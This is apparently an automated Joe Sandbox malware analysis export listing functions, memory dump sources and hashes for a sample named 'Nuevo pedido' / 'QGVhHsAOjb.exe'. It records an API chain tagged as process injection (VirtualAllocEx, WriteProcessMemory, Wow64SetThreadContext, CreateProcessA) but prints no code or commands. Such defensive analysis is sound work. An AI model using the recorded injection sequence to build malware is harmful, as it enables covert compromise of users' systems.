Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6941cddffbfe983368cc8516ed43a101b9bf84c59a91653e4ebdf1fa313e978
Instruction ID: fe81a972a5accb9be447dcd90c5c84848b547b2cae334a9ae098c9e06b1a9c1a
Opcode Fuzzy Hash: e6941cddffbfe983368cc8516ed43a101b9bf84c59a91653e4ebdf1fa313e978
Instruction Fuzzy Hash: 98116D76B012089FCB149F68DC54BDEBBB6FB8C754F15442AEA16E7290DB719C10CB90

Function 02F76300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd465c0b0f8046da10591e3d243a37206a42b1778374f8379144bd55cb742c36
Instruction ID: 8c396018b653c36e6f4d677e015057be69eaf9e6c3c2306e827659faff155b10
Opcode Fuzzy Hash: fd465c0b0f8046da10591e3d243a37206a42b1778374f8379144bd55cb742c36
Instruction Fuzzy Hash: 6C11A135B01A169FC7155B3AD49892EB7AAFFC96E53094479EA1ACB350CF21DC02CB90

Function 02E9D113 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138410317.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e9d000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 3021201dd6924e8d706fd2b3e8aad66602473bedea0fa7c6ce1bd54feb9b638b
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 4F119D76544280DFDB06DF24D9C4B15BFB1FB88318F24C6AAD8494B656C33AD44ACF61

Function 02F75E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8105930287d803d83705fe6e9167a64f7c002ca2b1f436dd466e1680a762fc9d
Instruction ID: df97f16e7f51afcb188da21bbc9c6bd893a8aef0c9c85ecc8ddd14367bd985d5
Opcode Fuzzy Hash: 8105930287d803d83705fe6e9167a64f7c002ca2b1f436dd466e1680a762fc9d
Instruction Fuzzy Hash: 7401D833B001196BCB019D98E8507EF3BDBEBC8690F19802AFA05D7284DE71CC119790

Function 02F72803 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4d6460ded6ea499ba1c99a5ca85cc7c69a43459a079e059af448af53c7e16c6
Instruction ID: bb6c1e879b0a8a2db05a956e26c5ddc956f7b3d74c72761a5019ac3d7d44d6bd
Opcode Fuzzy Hash: a4d6460ded6ea499ba1c99a5ca85cc7c69a43459a079e059af448af53c7e16c6
Instruction Fuzzy Hash: 641199B5D0120E8FCB40EFA9D9845EEBBF1FB49304F10566AD819F2210EB315A95CBA1

Function 02F7ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a0d1203b85771418592095e627364bb5130d7c98666103fa797b42571493ee6
Instruction ID: 656790fb5949b78194cae217507e9458d9d1e172435308cb866bfd54e66ee076
Opcode Fuzzy Hash: 9a0d1203b85771418592095e627364bb5130d7c98666103fa797b42571493ee6
Instruction Fuzzy Hash: 83F0C231B006145B87155A3ED454A2EB69EEFC8AE930A406BEA09C7361EF20CC028380

Function 015CD006 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138112044.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15cd000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1ee56ccdca4e75146e19b23275dbd7339b79627f2cba5ce614df98efc8c88d3
Instruction ID: 4b9f1a4e7ea14a5ed809c8dc40726ff794edb7b868360ec0f1abf8e1756353bc
Opcode Fuzzy Hash: d1ee56ccdca4e75146e19b23275dbd7339b79627f2cba5ce614df98efc8c88d3
Instruction Fuzzy Hash: C6012C30109780AFD322CF15C884C62BFB9FF8666071A84DAE8459F663C635EC05CBA1

Function 015CD01F Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138112044.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15cd000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f430619fb758cfd748629d41b853c825ca01e1bb6c8e3cdcb4f1142e2295cfa4
Instruction ID: 69e7ddc4b9659407a442203bdb103c27c552d306f1ebf0aa76782142ef25f43c
Opcode Fuzzy Hash: f430619fb758cfd748629d41b853c825ca01e1bb6c8e3cdcb4f1142e2295cfa4
Instruction Fuzzy Hash: A5F0FF75600604AFD7208F4AD885C67FBBDFBC4670715C56AE84A5B611D671EC42CEA0

Function 02F7E8FB Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dcde515c984d4b5cae373046bf77640c605e9d9d5467ff777bff6011b362a04
Instruction ID: bbcc95937b2db23637a3fb24afa1c83a6cabae55ea96ac37294cecd3ccd29796
Opcode Fuzzy Hash: 4dcde515c984d4b5cae373046bf77640c605e9d9d5467ff777bff6011b362a04
Instruction Fuzzy Hash: DD01E474E0020ADFCF01CFA9E4449AEBBB1FB49304F10856AE924A3350D7789A96CF91

Function 02F728A3 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b74db13da90b4a050e4833b024fd1b30f52aa4b4b47f61de646b0275a3a6a337
Instruction ID: c183ad30758cbf05dfacfe8cd278f7257779308d03131f6347107b114e8ba5c6
Opcode Fuzzy Hash: b74db13da90b4a050e4833b024fd1b30f52aa4b4b47f61de646b0275a3a6a337
Instruction Fuzzy Hash: D7E02031D543578BC702D7F09C000EEBB349DC2121B18855BC0A537050EF30211AC352

Function 02F728B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61ed3a306516daf68ba77d7dd6a862106890ec8255b4401aa426eb0fdead140c
Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
Opcode Fuzzy Hash: 61ed3a306516daf68ba77d7dd6a862106890ec8255b4401aa426eb0fdead140c
Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

Function 02F76739 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f4cb2481f32472d10961b02c75e49565298bf9aea94da8a488b13a6cf3f20b9
Instruction ID: dc4910b3918494294202d0284c3520cecf7913059d563f67e4cf6100fde0a33f
Opcode Fuzzy Hash: 9f4cb2481f32472d10961b02c75e49565298bf9aea94da8a488b13a6cf3f20b9
Instruction Fuzzy Hash: C9D05E3204431A0EC201FBB9ED557D6BB2AEBD0258F15852094054A35AEEB898D946A0

Function 02F7D6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aa7363894a3d08e3b25434d40bfeaf1dab11b37d56c9e609b6da69f10e78f87
Instruction ID: 270830536bf328f0576e7f0a01b449ccca6960f7aa439b1a31157466953762f4
Opcode Fuzzy Hash: 7aa7363894a3d08e3b25434d40bfeaf1dab11b37d56c9e609b6da69f10e78f87
Instruction Fuzzy Hash: D7D0E235E4000CCBCB20DFB8E4848DCFB71EF48361B10542AD925E3210C6305461CF04

Function 02F7AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4cdaa7f61b034390ea9272f63ff61f21f06ddb4c4bf4efa987219980a076e51
Instruction ID: d7faa909221bd86dbc1fd2e6c0f6e6abf544311082ec4000c9247391180c5ebe
Opcode Fuzzy Hash: b4cdaa7f61b034390ea9272f63ff61f21f06ddb4c4bf4efa987219980a076e51
Instruction Fuzzy Hash: AED0673AB40018DFCB059F99E8408DDF7B6FB98261B148516E915E3261CA319925DB54

Function 02F76748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6313f6da70077a1baa02594a83b237fc387a92e01d38776ae6d388d4b7bd0f0b
Instruction ID: fc5f1f6c31ecd3e9c88756f4fbbb38a63f71ad6964bb7e5bc1537d3bac6c48fe
Opcode Fuzzy Hash: 6313f6da70077a1baa02594a83b237fc387a92e01d38776ae6d388d4b7bd0f0b
Instruction Fuzzy Hash: EFC0123044430D4EC541FBB6ED45555B76EF6E0244740852094050A75DDFF89CDA4794

Non-executed Functions

Function 02F76920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 02F76936
\;^q, xrefs: 02F7695E
\;^q, xrefs: 02F76952
\;^q, xrefs: 02F7692C

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: 73f1acf2551a8d93594fd46224ffa49a658877ae10cbf20577c77f24ff0f7562
Instruction ID: 36fb587cc6089765615c156bb70be41b74081f421d9ea6fade5e3f99a8e87937
Opcode Fuzzy Hash: 73f1acf2551a8d93594fd46224ffa49a658877ae10cbf20577c77f24ff0f7562
Instruction Fuzzy Hash: 7801BC32B40A048FCB2C8E2DC564A2637FFAFC8AA0725446BE646CB3B4DA31DC41C750

Analysis Process: QGVhHsAOjb.exePID: 7900, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.5%
Total number of Nodes:	204
Total number of Limit Nodes:	14

Executed Functions

Function 050E0A40 Relevance: 3.1, APIs: 2, Instructions: 106
memoryinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 050E09F6
WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 050E0AD8

Memory Dump Source

Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd

Similarity

API ID: AllocMemoryProcessVirtualWrite
String ID:
API String ID: 645232735-0
Opcode ID: 4c8896a667e8ca744fa5fca6e01f3e7fb8338006c4763966a993b572423633df
Instruction ID: adfa13ac139beffb03fca8424f6a5fd907c2421b9c12ed5a9021e58fe5f05b91
Opcode Fuzzy Hash: 4c8896a667e8ca744fa5fca6e01f3e7fb8338006c4763966a993b572423633df
Instruction Fuzzy Hash: 8F4178B290020D9FDB10DFA9D845BEEBBF1FF88314F20842AE559A7250C7799594CBA0

Function 02F0D031 Relevance: 6.1, APIs: 4, Instructions: 130
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02F0D0BE
GetCurrentThread.KERNEL32 ref: 02F0D0FB
GetCurrentProcess.KERNEL32 ref: 02F0D138
GetCurrentThreadId.KERNEL32 ref: 02F0D191

Memory Dump Source

Source File: 0000000A.00000002.1776138099.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2f00000_QGVhHsAOjb.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 4b1e0c08db8a8854f2aa7ba9b9af1388e2da7dc764cb38fc8b087679861c21d7
Instruction ID: a6c8bb1fb766afbee54b705dd8158ab245533829b07ec26789da63c6028ee6aa
Opcode Fuzzy Hash: 4b1e0c08db8a8854f2aa7ba9b9af1388e2da7dc764cb38fc8b087679861c21d7
Instruction Fuzzy Hash: 8C5157B4900209CFEB15CFA9D588BDEBBF5EF88348F208459D119A72A0DB349844CF65

Function 02F0D040 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02F0D0BE
GetCurrentThread.KERNEL32 ref: 02F0D0FB
GetCurrentProcess.KERNEL32 ref: 02F0D138
GetCurrentThreadId.KERNEL32 ref: 02F0D191

Memory Dump Source

Source File: 0000000A.00000002.1776138099.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2f00000_QGVhHsAOjb.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 657746f10fd46115e90a1663c07278fb4879ba3be06e94035c6b145d9d4c20a1
Instruction ID: 23845514a41c0216f33a65333be03ebdf80a050d37b51dae8a13cd6770b555c5
Opcode Fuzzy Hash: 657746f10fd46115e90a1663c07278fb4879ba3be06e94035c6b145d9d4c20a1
Instruction Fuzzy Hash: 745146B09002098FEB14DFAAD588BDEBBF5EF88348F208459D118A73A0DB749844CF65

Function 050E0980 Relevance: 3.1, APIs: 2, Instructions: 91
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 050E092E
VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 050E09F6

Memory Dump Source

Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd

Similarity

API ID: AllocContextThreadVirtualWow64
String ID:
API String ID: 2727713192-0
Opcode ID: 2755bec709fb1610849f71c6dd0a21790eaf274e5ab9b68080bb495984309522
Instruction ID: 20d1a772e313b6cc907b5b06639642ed874ca4a2d1c0e5e7afa171cf529c850d
Opcode Fuzzy Hash: 2755bec709fb1610849f71c6dd0a21790eaf274e5ab9b68080bb495984309522
Instruction Fuzzy Hash: 8A319C728002498FDB20DFA9D4497EEFFF1EF88324F248419D459A7250CB799585CFA0

Function 05712868 Relevance: 2.7, Strings: 2, Instructions: 217COMMON

Download Yara Rule

Strings

Hbq, xrefs: 05712930
Hbq, xrefs: 05712996

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: c8bd021651bd46ee36572f3a365429f3c1cf111a8942f650775a498dc1bae532
Instruction ID: 4f7d99555eb19ce0178bc734b488a3b47a217e13d8f602f3d427322ef3478a09
Opcode Fuzzy Hash: c8bd021651bd46ee36572f3a365429f3c1cf111a8942f650775a498dc1bae532
Instruction Fuzzy Hash: 75817C74E003199FCB14DFA9C8846AEBBF6FF89340F14852AE409BB351DB349905CB95

Function 0571C30B Relevance: 2.6, Strings: 2, Instructions: 129COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0571C454
4'^q, xrefs: 0571C431

Memory Dump Source

Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 013b53215006a39845f2f93f726ac684a0e3f513f9d4025d901db23db228d500
Instruction ID: 62d6d67bfcc316160a1612fcdcab6069ea6fda4f816e7d31034b2ccbce4b792f
Opcode Fuzzy Hash: 013b53215006a39845f2f93f726ac684a0e3f513f9d4025d901db23db228d500
Instruction Fuzzy Hash: DA516F32D1170A9BDB04EFA8EC447D9F372FF94314F658A29D508BB251EB746989CB80

Function 050E0CC4 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 050E0F06

Memory Dump Source

Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f8c55107f9ecf9e80c0d439eaf14d911ef403783a4dc53c165ba7bc3e949ebc9
Instruction ID: 353d564c165b05cd1ad18cc4416f0554b8f3efda69ad7290e74d6cc554133fd5
Opcode Fuzzy Hash: f8c55107f9ecf9e80c0d439eaf14d911ef403783a4dc53c165ba7bc3e949ebc9
Instruction Fuzzy Hash: FAA1AC70D00219DFDB20CFA8D855BEDBBF2BF44314F2481A9E849A7290DBB49985CF91

Function 050E0CD0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 050E0F06

Memory Dump Source

Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2ace333cb0722eaf266027812f319e4cebb81a837f8d404f1479b23ed06d5c10
Instruction ID: f9ac5c6999909ada9d1b856b35ac3c9b24ef847f71c953a94ed6ebe62a6d1594
Opcode Fuzzy Hash: 2ace333cb0722eaf266027812f319e4cebb81a837f8d404f1479b23ed06d5c10
Instruction Fuzzy Hash: DB919C70D00619DFDB20CF68D855BEDBBF2BF48314F1481A9E809A7290DBB49985CF91

Function 02F0ADA8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02F0AFFE

Memory Dump Source

Source File: 0000000A.00000002.1776138099.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2f00000_QGVhHsAOjb.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2af448a7eca9893d76e522f504939d80956cce812fa4723b36c33627e025ee75
Instruction ID: c154a49d401bcd950dd0b75c12273c437e3b0ca1e9de5d0345972503f1968c4c
Opcode Fuzzy Hash: 2af448a7eca9893d76e522f504939d80956cce812fa4723b36c33627e025ee75
Instruction Fuzzy Hash: BA712870A00B058FD724DF2AD48475ABBF1BF88344F00892DD686D7A90D775E849CB90

Function 02F0590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02F059C9

Memory Dump Source

Source File: 0000000A.00000002.1776138099.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2f00000_QGVhHsAOjb.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: accad03772c05c9873e8d866e88950bc37a08126b478b28e0b2f264c65884377
Instruction ID: 0c781799ec1084b0056efa0d91b1b72959a3c10dff7901113a199baffeef0306
Opcode Fuzzy Hash: accad03772c05c9873e8d866e88950bc37a08126b478b28e0b2f264c65884377
Instruction Fuzzy Hash: B341F5B1C00719CFDB24CFAAC8847DDBBB5BF49304F24809AD409AB255DBB5694ACF50

Function 02F044C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02F059C9

Memory Dump Source

Source File: 0000000A.00000002.1776138099.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2f00000_QGVhHsAOjb.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1de873f5ed5ce9d6452870d765022b78f9655ed3fab828871dd412f644202110
Instruction ID: c065142186e8e345dea5baf883c893a0722588021419cdb8c07b503d761d9702
Opcode Fuzzy Hash: 1de873f5ed5ce9d6452870d765022b78f9655ed3fab828871dd412f644202110
Instruction Fuzzy Hash: E641F2B1C00719CFDB24CFAAC8847CEBBB5BF48304F60805AD509AB255DBB56949CF90

Function 050E0A48 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 050E0AD8

Memory Dump Source

Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 5a37388774d70ab9cc14539a919374fa89d13abbf0eb2144cde712ca461722c6
Instruction ID: a3b11e587818fbf5dacc8f27370182b6cb9b99867c514d80eeaa35410cd7dfd6
Opcode Fuzzy Hash: 5a37388774d70ab9cc14539a919374fa89d13abbf0eb2144cde712ca461722c6
Instruction Fuzzy Hash: B72155B190031D9FCB10CFA9C885BDEBBF5FF88310F10842AE959A7250C778A954CBA4

Function 050E08A8 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 050E092E

Memory Dump Source

Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e98cbaf80e34e3dade7966480ddb8f2f758976cd0f9e402d153ba804cd4f70d9
Instruction ID: 524e48eb330a8d0470b04488867aea77f3f50163cc2632a4c0e79ea84350372e
Opcode Fuzzy Hash: e98cbaf80e34e3dade7966480ddb8f2f758976cd0f9e402d153ba804cd4f70d9
Instruction Fuzzy Hash: 5F2137B19003099FDB10DFAAC4857EEBBF1FF88324F20842AD459A7240DB789945CFA4

Function 050E0B30 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 050E0BB8

Memory Dump Source

Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b4ce8b2bfd1dc0215437c714667865689a0cf82c864366208d8e1c54ed8232dc
Instruction ID: 1680fc9402b54f3c6e8052867c45b4f3fb78af392e09c99b5a20a8a4fd485720
Opcode Fuzzy Hash: b4ce8b2bfd1dc0215437c714667865689a0cf82c864366208d8e1c54ed8232dc
Instruction Fuzzy Hash: A02136B1C002599FDB10CFAAC885AEEFBF1FF88314F10842AE559A7250C7789941CFA4

Function 050E0B38 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 050E0BB8

Memory Dump Source

Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 9263ffe0db99f7ee66d27731e77f3c0c689ddb8e7b4de844d482f93a7c91f5ce
Instruction ID: 83f3fdab6b9595f37e21b8b2813745a6534e8f8877a752f73fe37bc3483e2001
Opcode Fuzzy Hash: 9263ffe0db99f7ee66d27731e77f3c0c689ddb8e7b4de844d482f93a7c91f5ce
Instruction Fuzzy Hash: 9F2145B18003599FCB10CFAAC884AEEFBF5FF48320F10842AE559A7250C7789940CBA4

Function 050E08B0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 050E092E

Memory Dump Source

Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ac192de2ceea3da0130106a3af7f5a345dc4c7e5bee7ad5c009b97b362928162
Instruction ID: 5b8233b1cd3771a0a17b878d19c1f167abc65c610c19abd5b12bea90953f29cf
Opcode Fuzzy Hash: ac192de2ceea3da0130106a3af7f5a345dc4c7e5bee7ad5c009b97b362928162
Instruction Fuzzy Hash: 672129B19003098FDB10DFAAC4857EEBBF4EF88324F148429D459A7240D7789945CFA5

Function 02F0D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F0D717

Memory Dump Source

Source File: 0000000A.00000002.1776138099.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2f00000_QGVhHsAOjb.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 66d4aa434713251857b0f5aea3cd7b8538467cf6f61fb2daacc76955ee067b42
Instruction ID: 46f26b8ce3ad22e349d8aa2970c5d89c943325da071c3466fe45bb7dd9eaacac
Opcode Fuzzy Hash: 66d4aa434713251857b0f5aea3cd7b8538467cf6f61fb2daacc76955ee067b42
Instruction Fuzzy Hash: EF21E2B59002589FDB10CFAAD984ADEBBF8EB48324F14801AE958A3350D374A950CFA4

Function 02F0D689 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

